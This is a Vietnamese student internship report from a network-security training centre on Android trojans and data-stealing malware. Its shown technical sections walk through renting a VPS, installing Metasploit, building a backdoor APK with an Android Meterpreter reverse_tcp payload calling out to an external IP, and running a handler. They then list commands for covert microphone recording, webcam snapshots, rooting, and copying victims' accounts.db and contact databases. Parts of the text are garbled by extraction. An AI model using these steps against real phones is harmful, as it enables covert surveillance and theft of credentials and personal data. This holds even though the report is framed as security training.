BÁO CÁO ĐỀ TÀI THỰC TẬP ATHENA - TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH LIÊN LẠC, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI GIÁO VIÊN HƯỚNG DẪN: THẦY VÕ ĐỖ THẮNG SINH VIÊN THỰC HIỆN: PHAN LÝ TRÚC ANH Tháng 11/2014 BÁO CÁO ĐỀ TÀI THỰC TẬP NHẬN XÉT (Của giáo viên hướng dẫn) , ngày …… tháng …… năm Giáo viên hướng dẫn BÁO CÁO ĐỀ TÀI THỰC TẬP Ảnh chụp với Giáo viên hướng dẫn – Thầy Võ Đỗ Thắng BÁO CÁO ĐỀ TÀI THỰC TẬP MỤC LỤC LỜI CẢM ƠN LỜI CAM KẾT MỞ ĐẦU A - GIỚI THIỆU VỀ TRUNG TÂM ATHENA Lĩnh vực hoạt động chính: Đội ngũ giảng viên: Cơ sở vật chất: Dịch vụ hỗ trợ: B – THỐNG KÊ QUÁ TRÌNH THỰC TẬP Thời gian thực tập: Liệt kê nội dung thực tập: C – NỘI DUNG THỰC TẬP CHI TIẾT .8 I TỔNG QUAN VỀ ANDROID .8 Giới thiệu: Đặc điểm: Tìm hiểu giống khác phiên Android 2.x 4.x: 11 II THIẾT ĐẶT, GIẢ LẬP THIẾT BỊ CHẠY ANDROID .13 Hướng dẫn tải cài đặt JDK SDK: 13 Hướng dẫn cài đặt thiết bị giả lập Android với phần mềm Eclipse: 18 Hướng dẫn cài đặt thiết bị giả lập Android phần mềm Genymotion: 21 III CÀI ĐẶT MÁY ẢO KALI LINUX 27 Chuẩn bị: 28 Tiến trình: 28 IV NGHIÊN CỨU LỖ HỔNG BẢO MẬT CỦA ANDROID 37 Tin tức thời bảo mật Android: 37 Khái niệm phân loại lỗ hổng bảo mật Android: 37 Nghiên cứu Malware, Trojan chế tạo mã độc Android: 38 V CÀI ĐẶT VÀO THIẾT BỊ ANDROID TROJAN ỨNG DỤNG iCALENDAR VÀ TROJAN ỨNG DỤNG iMATCH .39 Các Tools cần thiết để cài đặt: 39 Tải xem source code ứng dụng *.apk: .40 BÁO CÁO ĐỀ TÀI THỰC TẬP Cài đặt Trojan ứng dụng iCalendar.apk: 40 Cài đặt Trojan ứng dụng iMatch.apk 46 VI TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID 48 Các công cụ cần thiết: 48 Tiến trình: 48 VII TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC 57 Các công cụ cần thiết: 57 Tiến trình: 57 VIII KẾT NỐI MÁY CHỦ ẢO VPS .63 Giới thiệu máy chủ ảo VPS: 63 Đặc điểm VPS: 63 Giá trị sử dụng VPS: 64 Kết nối VPS: 64 IX CÀI ĐẶT METASPLOIT TRÊN VPS 64 Giới thiệu phần mềm Metasploit: 64 Giới thiệu payload Meterpreter: .65 Cài đặt Metasploit: 65 X TẤN CÔNG MÁY ANDROID TỪ MÁY VPS 67 Tạo ứng dụng chứa mã độc Kali Linux: 67 Tấn công điện thoại Android: 68 Các phương thức công sử dụng: 68 KẾT LUẬN 74 PHỤ LỤC I: VIDEO QUÁ TRÌNH THỰC HIỆN 75 PHỤ LỤC II: TRÍCH DẪN NGUỒN THAM KHẢO 76 BÁO CÁO ĐỀ TÀI THỰC TẬP LỜI CẢM ƠN Trước tiên , em xin cảm ơn đến thầy cô trường Đại học Khoa Học Tự Nhiên – TP Hồ Chí Minh nói chung thầy khoa Điện Tử Viễn Thơng, mơn Máy tính – Hệ thống nhúng nói riêng tận tình giảng dạy, truyền đạt cho em kiến thức, kinh nghiệm quý báu suốt bốn năm qua để em vững bước đường học tập cơng việc sau Đặc biệt em xin gửi lời cảm ơn lòng biết ơn sâu sắc đến thầy Võ Đỗ Thắng, thầy anh chị Trung tâm ATHENA tận tình giúp đỡ, bảo hướng dẫn em suốt thời gian thực tập Trong suốt thời gian làm việc với thầy trung tâm em không ngừng tiếp thu thêm nhiều kiến thức bổ ích mà cịn học tập tinh thần làm việc, thái độ nghiên cứu nghiêm túc, hiệu quả, chi tiết, làm quan với môi trường làm việc công nghiệp Đây điều cần thiết cho em trình học tập làm việc sau Sau em xin gửi lời cảm ơn tới gia đình, anh chị công tác khoa, bạn bè động viên, đóng góp ý kiến giúp đỡ q trình học tập, nghiên cứu hoàn thành thực tập tốt nghiệp TP Hồ Chí Minh, ngày tháng 11 năm 2014 Sinh viên thực Phan Lý Trúc Anh SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page BÁO CÁO ĐỀ TÀI THỰC TẬP LỜI CAM KẾT Em xin cam kết:  Những nội dung báo cáo em tự thực với hướng dẫn Thầy anh chị Trung Tâm ATHENA  Mọi tham khảo trình thực báo cáo trích dẫn rõ ràng nội dung, tác giả, địa tham khảo  Nếu chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu hồn tồn trách nhiệm TP Hồ Chí Minh, ngày tháng 11 năm 2014 Sinh viên thực Phan Lý Trúc Anh SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page BÁO CÁO ĐỀ TÀI THỰC TẬP MỞ ĐẦU Khi bắt đầu tìm kiếm mơi trường phù hợp cho việc thực tập, em đặt cho mục tiêu sau: - Tiếp cận với môi trường doanh nghiệp để học cách làm việc họ - Nắm quy trình phát triển phần mềm áp dụng đồng thời tiếp cận công nghệ - Sử dụng kiến thức học năm đầu - Nhận kiến thức cần thiết cho công việc mà không đề cập giảng đường - Trau dồi kỹ thân, kỹ làm việc nhóm khả sử dụng tiếng Anh chuyên ngành Xét thấy mục tiêu cần thiết với sinh viên rời khỏi ghế nhà trường, em cố gắng tìm kiêm cơng ty, doanh nghiệp hay trung tâm đáp ứng mong muốn Sau thời gian dài tìm hiểu thăm dị qua bạn bè người thân thấy “Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA” nhận sinh viên thực tập đề tài công nghệ di động, hệ điều hành di động Android mà em muốn tìm hiểu Em định nộp hồ sơ ứng tuyển vị trí thực tập sinh tháng Trung tâm ATHENA, trung tâm nhận vào vị trí thực tập viên tháng Ngày 21/7/2014 em bắt đầu trình thực tập trung tâm ATHENA SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page BÁO CÁO ĐỀ TÀI THỰC TẬP A - GIỚI THIỆU VỀ TRUNG TÂM ATHENA Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA thành lập từ năm 2004, tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lãnh vực Công nghệ thông tin, với tâm huyết góp phần vào cơng thúc đẩy tiến trình đưa cơng nghệ thơng tin ngành kinh tế mũi nhọn, góp phần phát triển nước nhà Lĩnh vực hoạt động chính: - Trung tâm ATHENA tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo tiêu chuẩn quốc tế hãng tiếng Microsoft, Cisco, Oracle, Linux LPI , CEH, Song song đó, trung tâm ATHENA cịn có chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị Bộ Quốc Phịng, Bộ Cơng An , ngân hàng, doanh nghiệp, quan phủ, tổ chức tài - Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành Cục Công Nghệ Thông Tin - Bộ Quốc Phịng , Bộ Cơng An, Sở Thơng Tin Truyền Thơng tỉnh, bưu điện tỉnh, - Ngồi chương trình đào tạo, Trung tâm ATHENA cịn có nhiều chương trình hợp tác trao đổi cơng nghệ với nhiều đại học lớn đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thơng, Hiệp hội an tồn thơng tin (VNISA), Viện Kỹ Thuật Qn Sự, Đội ngũ giảng viên: - Tất giảng viên trung tâm ATHENA có tốt nghiệp từ trường đại học hàng đầu nước, Tất giảng viên ATHENA phải có chứng quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH, có sư phạm Quốc tế (Microsoft Certified Trainer) Đây chứng chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy trung tâm ATHENA SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page BÁO CÁO ĐỀ TÀI THỰC TẬP - Bên cạnh đó,Các giảng viên ATHENA thường tu nghiệp cập nhật kiến thức công nghệ từ nước tiên tiến Mỹ, Pháp, Hà Lan, Singapore, truyền đạt công nghệ chương trình đào tạo trung tâm ATHENA Cơ sở vật chất: - Thiết bị đầy đủ đại - Chương trình cập nhật liên tục, bảo đảm học viên tiếp cận với cơng nghệ - Phịng máy rộng rãi, thoáng mát Dịch vụ hỗ trợ: - Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn - Giới thiệu việc làm cho học viên - Thực tập có lương cho học viên giỏi - Ngồi học thức, học viên thực hành thêm miễn phí, khơng giới hạn thời gian - Hỗ trợ kỹ thuật không thời hạn tất lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng - Hỗ trợ thi Chứng Quốc tế SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page BÁO CÁO ĐỀ TÀI THỰC TẬP Chờ nạn nhân truy cập vào đường dẫn http://192.168.149.136:87/ Ta nhận thơng tin máy nạn nhân: 2.4 Thốt khỏi XSSF Metasploit: Để thoát khỏi ta thực lệnh: “Ctrl + C” > “back” > “exit” > “exit” SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 62 BÁO CÁO ĐỀ TÀI THỰC TẬP VIII KẾT NỐI MÁY CHỦ ẢO VPS Giới thiệu máy chủ ảo VPS: - Máy chủ ảo (Virtual Private Server -VPS) phương pháp phân chia máy chủ vật lý thành nhiều máy chủ ảo Trong server chạy Share Host có hàng trăm tài khoản chạy lúc, server chạy VPS số 1/10 Do vậy, VPS có hiệu cao Share Host nhiều - Mỗi máy chủ hệ thống hồn tồn riêng biệt, có hệ điều hành riêng, có tồn quyền quản lý root restart lại hệ thống lúc Do vậy, VPS hạn chế 100% khả bị hack local - Trên server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, Website bị công Ddos, botnet mạnh làm ảnh hưởng đến Website khác server, riêng server VPS, tài khoản VPS bị cơng tài khoản khác VPS hoạt động bình thường - VPS dành cho doanh nghiệp vừa trang Web lớn mã nguồn nặng, chạy Share Host không đáp ứng đủ yêu cầu.Tuy nhiên, VPS địi hỏi người sử dụng phải có thêm số kiến thức bảo mật, cấu hình server,… Đặc điểm VPS: - Hoạt động hoàn toàn server riêng nên sở hữu phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa IP riêng hệ điều hành riêng - Tiết kiệm nhiều chi phí so với việc thuê server riêng - Ngoài việc dùng VPS để thiết lập Web Server, Mail Server ứng dụng khác cài đặt để thực yêu cầu riêng truy cập Web trình duyệt Web VPS, dowload/upload bittorrent với tốc độ cao… - Trong trường hợp VPS bị thiếu tài ngun dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống - Có thể cài lại hệ điều hành với thời gian từ 5-10 phút SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 63 BÁO CÁO ĐỀ TÀI THỰC TẬP Giá trị sử dụng VPS: - Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp - Miễn phí chi phí cài đặt ban đầu cấu hình hoạt động cho khác hàng - Hỗ trợ khác hàng cài đặt miễn phí thêm phần mềm riêng - Được cấu hình cài đặt hệ thống Firewall DDOS Protection - Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng có cố phát sinh Kết nối VPS: - Đối với máy hệ điều hành Windows, để kết nối với máy chủ ảo VPS, ta cần sử dụng ứng dụng Remote Desktop Connection - Để khởi động ứng dụng RDC này, ta cần vào Start > All Programs > Accessories > Remote Desktop Connection - Sau ta cần nhập vào Địa IP, Username Password cung cấp ta đăng ký tài khoản VPS - IX Như ta kết nối với máy chủ ảo VPS CÀI ĐẶT METASPLOIT TRÊN VPS  Sau kết nối máy VPS quyền Administrator, ta tiến hành tải cài đặt phần mềm Metasploit để phục vụ cho việc công điện thoại Android Giới thiệu phần mềm Metasploit: - Metasploit công cụ khai thác lỗ hổng hệ điều hành, dùng để kiểm tra, công khai thác lỗi service - Metasploit xây dựng từ ngôn ngữ hướng đối tượng Perl, với components viết C, Assembler, Python - Metasploit chạy hầu hết hệ điều hành: Linux, Windows, MacOS SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 64 BÁO CÁO ĐỀ TÀI THỰC TẬP Giới thiệu payload Meterpreter: - Meterpreter, viết tắt từ Meta-Interpreter advanced payload có Metasploit framework - Muc đích Meterpreter để cung cấp tập lệnh để khai thác, câng máy remote computers Nó viết từ developers dạng shared object( DLL) files - Meterpreter thành phần mở rộng thực thi nhớ, hồn tồn khơng ghi lên đĩa nên tránh phát từ phần mềm chống virus - Trong viết này, để cơng vào điện thoại Android ta sử dụng payload Meterpreter Cài đặt Metasploit: Bước 1: Tải Metasploit từ trang chủ www.metasploit.com trang download http://www.rapid7.com/products/metasploit/download.jsp Ta sử dụng Community Bước 2: Tiến hành đăng ký để tải Metasploit SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 65 BÁO CÁO ĐỀ TÀI THỰC TẬP Sau đăng ký, ta tải Và ta nhận mail có chứa Key để Active Metasploit sau cài đặt Mail gửi địa Email mà bạn đăng ký Bước 3: Cài đặt phần mềm qua file tải - Chọn thư mục cài đặt - Chọn Port dịch vụ Metasploit sử dụng, mặc định 3790 - Chọn server ngày hết hạn, để mặc định - Nhấp Next Metasploit cài đặt vào thư mục chọn - Nhấp Finish truy cập đến giao diện web chương trình Bước 4: Active phần mềm Metasploit cách truy cập vào link https://localhost:3790/ Tạo tài khoản sử dụng: SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 66 BÁO CÁO ĐỀ TÀI THỰC TẬP Nhập Key nhận từ email: Chọn ACTIVATE LICENSE Bước 5: Khởi động Metasploit cách vào Start > Progams > Metasploit > Metasploit Console X TẤN CÔNG MÁY ANDROID TỪ MÁY VPS Tạo ứng dụng chứa mã độc Kali Linux: Trước tiên, ta cần ứng dụng backdoor để nạn nhân cài vào điện thoại Android Bước 1: Khởi động máy ảo Kali Linux Mở Terminal Bước 2: Thực lệnh sau để tạo mã độc từ payload Meterpreter: “msfpayload android/meterpreter/reverse_tcp lhost = lport= R > / ” SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 67 BÁO CÁO ĐỀ TÀI THỰC TẬP Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R> /root/Desktop/hack.apk Tấn công điện thoại Android: Bước 1: Tại máy VPS, mở Metasploit Console Đợi phần mềm khởi động, vài chục phút Bước 2: Tiến hành thiết đặt payload lệnh  “ use exploit/multi/handler ”  “ set payload android/meterpreter/reverse_tcp ”  “ set lhost 14.0.21.162 ”  “ set lport 4444 ”  “ run ” Ta phải sử dụng payload, lhost, lport mà ta dùng để tạo backdoor Bước 3: Sau đó, Metasploit khởi động handler để chờ đợi kết nối từ máy Android nạn nhân Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta nhận thông báo sau: Bước 4: Dùng lệnh “help” để kiểm tra lệnh ta thao tác Các phương thức công sử dụng: Sau giới thiệu số phương thức để tân công máy Android nạn nhân 3.1 Ghi âm lén: Sử dụng lệnh: “ record_mic ” SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 68 BÁO CÁO ĐỀ TÀI THỰC TẬP 3.2 Sử dụng camera: Xem danh sách webcam thiết bị: “ webcam_list ” Chụp ảnh lén: “webcam_snap ” 3.3 Tải xóa file từ nhớ sdcard: Di chuyển vào thư mục lệnh: cd Tải lệnh: download Xóa tập tin lệnh: rm 3.4 Truy cập trực tiếp vào hệ thống: Truy cập vào hệ thống lệnh: “shell” > “su” Kiểm tra máy root hay chưa lệnh: “whoami” Nếu kết trả “whoami: unknown uid 0” máy root Ta tiếp tục cơng SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 69 BÁO CÁO ĐỀ TÀI THỰC TẬP 3.5 Truy cập khai thác tài khoản người dùng: Thực lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l” Copy file thẻ nhớ sdcard lệnh: “cp accounts.db /sdcard” Trở meterpreter tải file accounts.db về: Sử dụng tiện ích SQLite Manager Firefox để xem nội dung accounts.db SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 70 BÁO CÁO ĐỀ TÀI THỰC TẬP 3.6 Truy cập đánh cắp danh bạ điện thoại: Thực lệnh để vào xem file lưu trữ danh bạ điện thoại: “cd /data/data/com.android.providers.contacts/databases” Copy thẻ sdcard tải máy SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 71 BÁO CÁO ĐỀ TÀI THỰC TẬP Xem nội dung contacts2.db SQLite Manager 3.7 Một số câu lệnh khác: - Để biết thêm lệnh thực ta dùng help - Để xem thông tin máy, nhập lệnh sysinfo SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 72 BÁO CÁO ĐỀ TÀI THỰC TẬP - Để xem tác vụ chạy gõ ps - Xem ip máy bị hack ta gõ ipconfig - Xem danh sách thư mục, file gõ ls - Để upload gõ lệnh upload - ls -l danh mục file quyền - Để ăn cắp tài khoản, mật khẩu, file apk thay đổi quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ - Để xem danh sách down load file hay thay đổi file ROM Đầu tiên phải gõ lệnh SU để có tồn quyền truy cập Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data - Ctrl + C để quay lại SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 73 BÁO CÁO ĐỀ TÀI THỰC TẬP KẾT LUẬN Qua thời gian thực tập Trung tâm ATHENA, em học hỏi nhiều kiến thức kinh nghiệm sống Phong cách môi trường làm việc chuyên nghiệp, tinh thần trách nhiệm cao, tâm sáng tạo công việc, cần cù, siêng năng, chăm Do thời gian thực tập chưa lâu, kiến thức thân hạn chế nên dù cố gắng báo cáo thực tập em không tránh khỏi sai sót, khuyết điểm Em mong góp ý bảo thầy để báo cáo thực tập em hoàn chỉnh Một lần nữa, em xin cảm ơn đến thầy cô trường Đại học Khoa Học Tự Nhiên – TP Hồ Chí Minh, thầy cơ, anh chị công tác khoa Điện Tử Viễn Thông em xin chân thành cảm ơn thầy Võ Đỗ Thắng thầy cô anh chị trung tâm ATHENA tận tình giúp đỡ em hồn thành báo cáo TP Hồ Chí Minh, ngày tháng 11 năm 2014 Sinh viên thực Phan Lý Trúc Anh SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 74 BÁO CÁO ĐỀ TÀI THỰC TẬP PHỤ LỤC I: VIDEO QUÁ TRÌNH THỰC HIỆN  Tạo máy ảo Android Virtual Device phần mềm Eclipse http://youtu.be/7p9_0ojdmqs  Tạo máy ảo Android Genymotion Virtual Box http://youtu.be/DkxtthrNb9o  Cài đặt Kali Linux VMware http://youtu.be/90e-w3SGJnY  Cài đặt trojan iCalendar trojan iMatch http://youtu.be/1JE0hrsZmsk  Tạo file chứa mã độc để công vào máy Android http://youtu.be/iEawr1JupZ8  Tạo mã độc tên trang web XSSF http://youtu.be/1Jw8F_H0Jz4  Tấn công Android từ môi trường VPS http://youtu.be/4Ueat8f-OoM  Clip giới thiệu thân đề tài thực tập http://youtu.be/iRfXCEXI9lo  Clip tổng kết đề tài http://youtu.be/sbs4YvvMM-Y SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 75 BÁO CÁO ĐỀ TÀI THỰC TẬP PHỤ LỤC II: TRÍCH DẪN NGUỒN THAM KHẢO http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82may-android-110510 http://sinhvienit.net/forum http://forum.bkav.com.vn http://developer.android.com/sdk/index.html#download http://www.oracle.com/technetwork/java/javase/downloads http://choimobile.vn/forums/#thao-luan-hdh-android.62 http://www.oracle.com/technetwork/serverstorage/virtualbox/downloads/index.html http://www.genymotion.com/ http://www.whitehat.vn/threads/ https://code.google.com/p/dex2jar/ https://code.google.com/p/innlab/downloads/detail?name=jd-gui0.3.3.windows.zip& http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apkbang-giao-dien-cuc-manh.12/ Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – www.Athena.Edu.Vn Giáo trình Lập trình thiết bị di động Android – Trung tâm Tin Học Trường ĐH Khoa học Tự Nhiên – ĐHQG TPHCM – www.t3h.vn SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page 76 ... Page 36 BÁO CÁO ĐỀ TÀI THỰC TẬP IV NGHIÊN CỨU LỖ HỔNG BẢO MẬT CỦA ANDROID Tin tức thời bảo mật Android: - Android hệ điều hành điện thoại chiếm tỷ phần lớn trường smartphone đồng thời Android. .. mật Android Tìm hiểu cách thức hoạt động malware, trojan,? ?? SVTH: PHAN LÝ TRÚC ANH MSSV: 1020005 Page BÁO CÁO ĐỀ TÀI THỰC TẬP Tuần - Nghiên cứu tạo file chứa mã độc Kali Linux công vào điện thoại. .. Page BÁO CÁO ĐỀ TÀI THỰC TẬP Google thực mô tả kỹ thuật chi tiết, họ trình diễn sản phẩm mẫu cho nhà sản xuất điện thoại di động nhà mạng Tháng năm 2007, InformationWeek đăng tải nghiên cứu Evalueserve